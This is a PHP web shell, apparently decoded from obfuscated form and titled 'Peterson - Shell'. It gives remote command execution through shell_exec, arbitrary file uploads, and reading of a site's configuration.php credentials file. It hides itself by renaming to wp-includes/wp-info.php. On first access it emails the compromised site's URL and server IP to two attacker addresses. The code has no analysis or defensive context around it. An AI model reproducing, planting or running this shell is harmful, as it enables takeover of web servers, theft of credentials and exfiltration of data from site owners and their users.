/* Decoded by unphp.net */ @ini_restore("disable_functions"); if (!isset($_SESSION['bajak'])) { $visitcount = 0; $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Shell Injector $web$inj"; $safem0de = @ini_get('safe_mode'); if (!$safem0de) {$security= "SAFE_MODE = OFF";} else {$security= "SAFE_MODE = ON";}; $df='ini_get disable!'; $serper=gethostbyname($_SERVER['SERVER_ADDR']); $injektor = gethostbyname($_SERVER['REMOTE_ADDR']); mail("peterdlegend@aol.com", "$body","Shell Result http://$web$inj $security IP Server = $serper IP Injector= $injektor"); mail("d.thompson13@outlook.com", "$body","Shell Result http://$web$inj $security IP Server = $serper IP Injector= $injektor"); $_SESSION['bajak'] = 0; } else {$_SESSION['bajak']++;}; if(isset($_GET['clone'])){ $source = $_SERVER['SCRIPT_FILENAME']; $desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-info.php"; rename($source, $desti); } $safem0de = @ini_get('safe_mode'); if (!$safem0de) {$security= "SAFE_MODE : OFF";} else {$security= "SAFE_MODE : ON";} echo "Peterson - Shell

"; echo "".$security."
"; $cur_user="(".get_current_user().")"; echo "User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."
"; echo "Uname : ".php_uname()."
"; echo "Disable Functions : ";$df='ini_get disable!'; if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "NONE";}else{echo "$df";} function pwd() { $cwd = getcwd(); if($u=strrpos($cwd,'/')){ if($u!=strlen($cwd)-1){ return $cwd.'/';} else{return $cwd;}; } elseif($u=strrpos($cwd,'\')){ if($u!=strlen($cwd)-1){ return $cwd.'\';} else{return $cwd;}; }; } echo '
Command
'; echo '
Upload File

New name:
'; if(isset($_POST['submit'])){ $uploaddir = pwd(); if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];}; move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name); if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){ echo "Upload Failed"; } else { echo "Upload Success to ".$uploaddir.$name." :D "; } } if(isset($_POST['command'])){ $cmd = $_POST['cmd']; echo "
".shell_exec($cmd)."
"; } else { echo "
".shell_exec('ls -la')."
"; } if(isset($_GET['baca'])){ $conf = file_get_contents("../../configuration.php"); echo $conf; }